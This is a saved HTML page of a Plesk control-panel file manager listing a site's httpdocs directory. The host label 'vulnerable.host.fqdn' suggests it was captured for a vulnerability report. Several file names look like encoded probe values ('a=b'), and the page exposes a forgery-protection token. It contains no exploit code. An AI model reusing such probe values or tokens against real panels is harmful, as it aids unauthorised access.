           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"File manager","href":"\/plesk\/client@2\/domain@1\/hosting\/file-manager\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/edit/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-create-dir" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_dir_oC();return false;" style=""><BUTTON name="bname_create_dir" id="buttonid-create-dir" type="button" onClick="Event.stop(event);new_dir_oC();return false;">Add New Directory</BUTTON><SPAN id="spanid-create-dir">Add New Directory</SPAN></DIV>
           <DIV class="commonButton" id="bid-create-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new file.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_file_oC();return false;" style=""><BUTTON name="bname_create_file" id="buttonid-create-file" type="button" onClick="Event.stop(event);new_file_oC();return false;">Add New File</BUTTON><SPAN id="spanid-create-file">Add New File</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>&nbsp;</td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();" onMouseOver="f(event, &#039;pdir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_pdir.gif" width="16" height="16" alt="file_pdir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">..</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 03:11 PM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_App_Data" value="App_Data" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();">App_Data</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=App_Data" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2FApp_Data" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_css" value="css" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();">css</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=css" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fcss" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_img" value="img" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();">img</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=img" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fimg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_picture_library" value="picture_library" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();">picture_library</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=picture_library" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fpicture_library" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_test" value="test" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();">test</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/test" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=test" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Ftest" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%200fd28a9909b" value="%20a%3db%200fd28a9909b" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25200fd28a9909b" onClick="return bin();;lon();">%20a%3db%200fd28a9909b</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%200fd28a9909b" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25200fd28a9909b" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%202d0878db96d" value="%20a%3db%202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" 